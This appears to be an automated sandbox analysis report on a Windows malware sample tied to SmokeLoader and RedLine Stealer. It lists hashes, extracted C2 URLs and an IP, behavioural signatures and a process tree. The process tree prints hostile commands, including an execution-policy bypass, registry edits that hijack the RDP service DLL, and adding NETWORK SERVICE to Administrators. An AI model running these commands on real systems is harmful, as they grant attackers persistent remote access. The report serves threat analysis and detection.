Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
10-12-2021 02:42
Static task
static1
Behavioral task
behavioral1
Sample
25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
Resource
win10-en-20211208
General
-
Target
25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe
-
Size
218KB
-
MD5
26d0fb61e2a20ede3a49f4d6246b64cd
-
SHA1
eddaaa5c7dd217a818d57c216277cf081232dba6
-
SHA256
25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e
-
SHA512
f792ec1033410eaca68b3e882a54211f3a4d48b0416170b8a69dc0a22b970bef5e49879d4569a53c268609e5c8f433d80a47697828ce7f876e39e5837d90822a
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
redline
195.133.47.114:38627
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\5679.exe family_redline C:\Users\Admin\AppData\Local\Temp\5679.exe family_redline behavioral1/memory/4308-132-0x00000000011F0000-0x000000000125C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 96 224 powershell.exe 98 224 powershell.exe 99 224 powershell.exe 101 224 powershell.exe 103 224 powershell.exe 105 224 powershell.exe 107 224 powershell.exe 109 224 powershell.exe 111 224 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
5679.exe7A4D.exeC91A.exepid process 4384 5679.exe 4308 7A4D.exe 2136 C91A.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 396 -
Loads dropped DLL 2 IoCs
Processes:
pid process 3040 3040 -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
7A4D.exepid process 4308 7A4D.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C7C.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_xrsqowxr.irz.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C5B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C6B.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_mn10cpp0.m3m.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C3A.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C5A.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 98 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 99 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 101 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 103 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exepid process 3380 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe 3380 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 396 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 628 628 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exepid process 3380 25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 396 Token: SeCreatePagefilePrivilege 396 Token: SeShutdownPrivilege 396 Token: SeCreatePagefilePrivilege 396 Token: SeDebugPrivilege 1504 powershell.exe Token: SeDebugPrivilege 4844 powershell.exe Token: SeIncreaseQuotaPrivilege 4844 powershell.exe Token: SeSecurityPrivilege 4844 powershell.exe Token: SeTakeOwnershipPrivilege 4844 powershell.exe Token: SeLoadDriverPrivilege 4844 powershell.exe Token: SeSystemProfilePrivilege 4844 powershell.exe Token: SeSystemtimePrivilege 4844 powershell.exe Token: SeProfSingleProcessPrivilege 4844 powershell.exe Token: SeIncBasePriorityPrivilege 4844 powershell.exe Token: SeCreatePagefilePrivilege 4844 powershell.exe Token: SeBackupPrivilege 4844 powershell.exe Token: SeRestorePrivilege 4844 powershell.exe Token: SeShutdownPrivilege 4844 powershell.exe Token: SeDebugPrivilege 4844 powershell.exe Token: SeSystemEnvironmentPrivilege 4844 powershell.exe Token: SeRemoteShutdownPrivilege 4844 powershell.exe Token: SeUndockPrivilege 4844 powershell.exe Token: SeManageVolumePrivilege 4844 powershell.exe Token: 33 4844 powershell.exe Token: 34 4844 powershell.exe Token: 35 4844 powershell.exe Token: 36 4844 powershell.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeIncreaseQuotaPrivilege 5088 powershell.exe Token: SeSecurityPrivilege 5088 powershell.exe Token: SeTakeOwnershipPrivilege 5088 powershell.exe Token: SeLoadDriverPrivilege 5088 powershell.exe Token: SeSystemProfilePrivilege 5088 powershell.exe Token: SeSystemtimePrivilege 5088 powershell.exe Token: SeProfSingleProcessPrivilege 5088 powershell.exe Token: SeIncBasePriorityPrivilege 5088 powershell.exe Token: SeCreatePagefilePrivilege 5088 powershell.exe Token: SeBackupPrivilege 5088 powershell.exe Token: SeRestorePrivilege 5088 powershell.exe Token: SeShutdownPrivilege 5088 powershell.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeSystemEnvironmentPrivilege 5088 powershell.exe Token: SeRemoteShutdownPrivilege 5088 powershell.exe Token: SeUndockPrivilege 5088 powershell.exe Token: SeManageVolumePrivilege 5088 powershell.exe Token: 33 5088 powershell.exe Token: 34 5088 powershell.exe Token: 35 5088 powershell.exe Token: 36 5088 powershell.exe Token: SeDebugPrivilege 2440 powershell.exe Token: SeIncreaseQuotaPrivilege 2440 powershell.exe Token: SeSecurityPrivilege 2440 powershell.exe Token: SeTakeOwnershipPrivilege 2440 powershell.exe Token: SeLoadDriverPrivilege 2440 powershell.exe Token: SeSystemProfilePrivilege 2440 powershell.exe Token: SeSystemtimePrivilege 2440 powershell.exe Token: SeProfSingleProcessPrivilege 2440 powershell.exe Token: SeIncBasePriorityPrivilege 2440 powershell.exe Token: SeCreatePagefilePrivilege 2440 powershell.exe Token: SeBackupPrivilege 2440 powershell.exe Token: SeRestorePrivilege 2440 powershell.exe Token: SeShutdownPrivilege 2440 powershell.exe Token: SeDebugPrivilege 2440 powershell.exe Token: SeSystemEnvironmentPrivilege 2440 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 396 396 -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid process 396 396 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
C91A.exepowershell.execsc.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 396 wrote to memory of 4384 396 5679.exe PID 396 wrote to memory of 4384 396 5679.exe PID 396 wrote to memory of 4384 396 5679.exe PID 396 wrote to memory of 4308 396 7A4D.exe PID 396 wrote to memory of 4308 396 7A4D.exe PID 396 wrote to memory of 4308 396 7A4D.exe PID 396 wrote to memory of 2136 396 C91A.exe PID 396 wrote to memory of 2136 396 C91A.exe PID 2136 wrote to memory of 1504 2136 C91A.exe powershell.exe PID 2136 wrote to memory of 1504 2136 C91A.exe powershell.exe PID 1504 wrote to memory of 2708 1504 powershell.exe csc.exe PID 1504 wrote to memory of 2708 1504 powershell.exe csc.exe PID 2708 wrote to memory of 2760 2708 csc.exe cvtres.exe PID 2708 wrote to memory of 2760 2708 csc.exe cvtres.exe PID 1504 wrote to memory of 3580 1504 powershell.exe csc.exe PID 1504 wrote to memory of 3580 1504 powershell.exe csc.exe PID 3580 wrote to memory of 3140 3580 csc.exe cvtres.exe PID 3580 wrote to memory of 3140 3580 csc.exe cvtres.exe PID 1504 wrote to memory of 4844 1504 powershell.exe powershell.exe PID 1504 wrote to memory of 4844 1504 powershell.exe powershell.exe PID 1504 wrote to memory of 5088 1504 powershell.exe powershell.exe PID 1504 wrote to memory of 5088 1504 powershell.exe powershell.exe PID 1504 wrote to memory of 2440 1504 powershell.exe powershell.exe PID 1504 wrote to memory of 2440 1504 powershell.exe powershell.exe PID 1504 wrote to memory of 2984 1504 powershell.exe reg.exe PID 1504 wrote to memory of 2984 1504 powershell.exe reg.exe PID 1504 wrote to memory of 1992 1504 powershell.exe reg.exe PID 1504 wrote to memory of 1992 1504 powershell.exe reg.exe PID 1504 wrote to memory of 3712 1504 powershell.exe reg.exe PID 1504 wrote to memory of 3712 1504 powershell.exe reg.exe PID 1504 wrote to memory of 2820 1504 powershell.exe net.exe PID 1504 wrote to memory of 2820 1504 powershell.exe net.exe PID 2820 wrote to memory of 3440 2820 net.exe net1.exe PID 2820 wrote to memory of 3440 2820 net.exe net1.exe PID 1504 wrote to memory of 3204 1504 powershell.exe cmd.exe PID 1504 wrote to memory of 3204 1504 powershell.exe cmd.exe PID 3204 wrote to memory of 1180 3204 cmd.exe cmd.exe PID 3204 wrote to memory of 1180 3204 cmd.exe cmd.exe PID 1180 wrote to memory of 4316 1180 cmd.exe net.exe PID 1180 wrote to memory of 4316 1180 cmd.exe net.exe PID 4316 wrote to memory of 4260 4316 net.exe net1.exe PID 4316 wrote to memory of 4260 4316 net.exe net1.exe PID 1504 wrote to memory of 4232 1504 powershell.exe cmd.exe PID 1504 wrote to memory of 4232 1504 powershell.exe cmd.exe PID 4232 wrote to memory of 4280 4232 cmd.exe cmd.exe PID 4232 wrote to memory of 4280 4232 cmd.exe cmd.exe PID 4280 wrote to memory of 4428 4280 cmd.exe net.exe PID 4280 wrote to memory of 4428 4280 cmd.exe net.exe PID 4428 wrote to memory of 4404 4428 net.exe net1.exe PID 4428 wrote to memory of 4404 4428 net.exe net1.exe PID 580 wrote to memory of 3312 580 cmd.exe net.exe PID 580 wrote to memory of 3312 580 cmd.exe net.exe PID 3312 wrote to memory of 3808 3312 net.exe net1.exe PID 3312 wrote to memory of 3808 3312 net.exe net1.exe PID 4272 wrote to memory of 408 4272 cmd.exe net.exe PID 4272 wrote to memory of 408 4272 cmd.exe net.exe PID 408 wrote to memory of 1500 408 net.exe net1.exe PID 408 wrote to memory of 1500 408 net.exe net1.exe PID 1820 wrote to memory of 2480 1820 cmd.exe net.exe PID 1820 wrote to memory of 2480 1820 cmd.exe net.exe PID 2480 wrote to memory of 2656 2480 net.exe net1.exe PID 2480 wrote to memory of 2656 2480 net.exe net1.exe PID 2776 wrote to memory of 2688 2776 cmd.exe net.exe PID 2776 wrote to memory of 2688 2776 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe"C:\Users\Admin\AppData\Local\Temp\25187c7dd18eb9dcef2feaae4aa1c3b8788dc645f48734e124a81d02d2e28d9e.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\5679.exeC:\Users\Admin\AppData\Local\Temp\5679.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7A4D.exeC:\Users\Admin\AppData\Local\Temp\7A4D.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\C91A.exeC:\Users\Admin\AppData\Local\Temp\C91A.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lr4k5ras\lr4k5ras.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDED3.tmp" "c:\Users\Admin\AppData\Local\Temp\lr4k5ras\CSC5C40ACA4BE2147D9BD68D9DAF850F52C.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xqe10l4e\xqe10l4e.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE3F3.tmp" "c:\Users\Admin\AppData\Local\Temp\xqe10l4e\CSC3BEEE61E154A1387A84C6526928EB.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
